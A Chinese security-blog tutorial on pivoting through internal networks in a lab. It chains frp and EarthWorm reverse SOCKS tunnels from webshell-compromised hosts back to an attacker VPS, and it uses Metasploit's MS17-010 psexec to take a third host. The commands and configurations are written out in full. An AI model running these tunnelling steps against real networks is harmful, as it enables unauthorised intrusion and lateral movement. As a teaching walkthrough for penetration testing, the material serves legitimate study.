Socks代理实战(2)

  • A+
所属分类:安全博客

Socks代理实战·2

/04 Socks代理实战-frp

首先你要有个VPS(frps服务器)

准备好穿透工具frp

先这样,后那些,再这样,最后在那样 —— 懂了么,怎么听不懂呢,再说一遍。先这样,后那样,再这样,最后在那样懂了吧。怎么还是不懂。

说细点

一,VPS

准备好frp包

Socks代理实战(2)

vps上解压,并创建一个配置文件frps_vps.ini,文件名其实随意,主要是配置信息一致。

1
2
3
4
5
6
7
vim frps_vps.ini

[common]
bind_port=7000

:wq
./ftps -c frps_vps.ini #启动frps

Socks代理实战(2)

二,Target1

当我们拿到一个网站的shell并用yijian连接后上传frpc和配置文件(配置文件自己写也可以):

Socks代理实战(2)

检查配置信息启动frp客户端:

Socks代理实战(2)

这时候vps服务器会接收到数据,还要注意,被控制方可以访问到我们的VPS。

配置文件解释:

common:

server_addr为VPS的IP,

server_port为VPS bind_port配置的端口,

socks5:

type传输类型

remote_port传输端口

plugin代理类型

Proxychains

配置信息注意Ip为VPSip,端口为target转交的端口

Socks代理实战(2)

Socks代理实战(2)

三,Target2

然后再通过代理拿到target2的webshell,yijian连接

然后老套路上传frpc和配置信息

但是Target2处于内网,访问不到我们的VPS那怎么办呢,只能能Target1作为frps了

上传Target1的frps和配置文件

Socks代理实战(2)

配置文件信息:

Socks代理实战(2)

启动服务:

Socks代理实战(2)

target2的配置信息:

Socks代理实战(2)

跟VPS到Target1的配置几乎一样,将本机的流量传输给frps服务器192.168.22.128的10089端口

Tips:192.168.1.128也是Target1的一个网卡但是Target2并不能传到所以要为192.168.22.128同网段的

Socks代理实战(2)

Socks代理实战(2)

重要配置现在Target2已经挂载代理到Target1了但是,我们攻击机并不能访问,流量并没有通向我们这,所以要修改一下target1的frpc的配置要将192.168.22.129的流量经过自己10089转交到VPS的10090端口配置信息如下:

Socks代理实战(2)

比一层代理多了一端转发将本机1089端口转发到VPS的10090端口

配置好重新运行即可

修改proxychains的代理端口为10090

Socks代理实战(2)

然后通过VPS探测33.33主机的信息

Socks代理实战(2)

Tip:socks代理也可以设置身份验证来达到自己建立的通道不被他人盗用,需要在客户端通道信息下面添加plugin_usename和plugin_password的字段。

frp代理限于环境原因经常意外中断需要重新启动检查时建议使用,ps命令和netsat -anlp来回检查使用。

/05 EW

前置:

Socks代理实战(2)

一,EW的一层代理

VPS192.168.1.129:

1
./ew -s rcsocks -l 1888 -e 7788

Socks代理实战(2)

target1:192.168.1.128|192.168.22.128

1
./ew -s rssocks -d 192.168.1.129 -e 7788

Socks代理实战(2)

Socks代理实战(2)

proxychains配置:

Socks代理实战(2)

使用proxychains访问内网target2(192.168.22.129)

Socks代理实战(2)

二,EW二层代理

注意建立好一层才能访问到Target2哦才能建立代理二层哦,建立好二层一层就可以终止了

VPS192.168.1.129:

1
./ew_for_linux64 -s lcx_listen -l 10088 -e 8888

Socks代理实战(2)

Target2,192.168.22.129:

1
./ew_for_linux64 -s ssocksd -l 9999

Socks代理实战(2)

Target1,192.168.1.128||192.168.22.128:

1
./ew_for_linux64 -s lcx_slave -d 192.168.1.129 -e 8888 -f 192.168.22.129 -g 9999

Socks代理实战(2)

VPS的socks代理成功提示:

Socks代理实战(2)

proxuchains nmap验证:

Socks代理实战(2)

使用msf拿到target3的shell通过信息收集知道target3存在ms017_010_psexec

Socks代理实战(2)

Socks代理实战(2)

Socks代理实战(2)

Socks代理实战(2)

Socks代理实战(2)

拿到了shell上传ew

四,EW建立三层代理

VPS192.168.1.129:

1
./ew_for_linux64 -s rcsocks -l 10090 -e 6666

Socks代理实战(2)

Target2,192.168.22.129|192.168.33.128:

1
./ew_for_linux64 -s lcx_listen -l 7778 -e 7777

Socks代理实战(2)

Target3,192.168.33.33:

1
./ew_for_linux64 -s rssocks -d 192.168.33.128 -e 7777

Socks代理实战(2)

Target1,192.168.1.128|192.168.22.128:

1
./ew_for_linux64 -d 192.168.1.128 -e 6666 -f 192.168.22.129 -g 7778

Socks代理实战(2)

由底层到VPS的转发过程:

Target3,192.168.33.33:将流量转发至192.168.33.128:7777

1
./ew_for_linux64 -s rssocks -d 192.168.33.128 -e 7777

Target2,192.168.22.129|192.168.33.128:将本地7777的流量转发至7778

1
./ew_for_linux64 -s lcx_listen -l 7778 -e 7777

Target1,192.168.1.128|192.168.22.128:将Target2(192.168.22.128)7778转义到VPS的6666端口

1
./ew_for_linux64 -d 192.168.1.129 -e 6666 -f 192.168.22.128 -g 7778

VPS192.168.1.129:

1
./ew_for_linux64 -s rcsocks -l 10090 -e 6666

将VPS的6666端口转发至10090用户建立代理VPSIP+10090端口即可访问到三层代理,

只提供重VPS到Target3的流量并不能访问Target1,2哦,但是一般穿透内网都是一层一层打下来所以一定拿到了target1,2的shell和一二层的代理,注意端口别重复使用哦。

建立代理提前搭建流量流通模型更方便理解思考

FROM :https://ailumao.cn/ | Author:Ailumao

相关推荐: HITCON 2015 lalala(SSRF)

题目连接:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_3/index.php 一个文件上传题,尝试上传个图片,结果: 好吧,环境没搭好,这不能怪我了,我只能看源码来搭了。 但…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: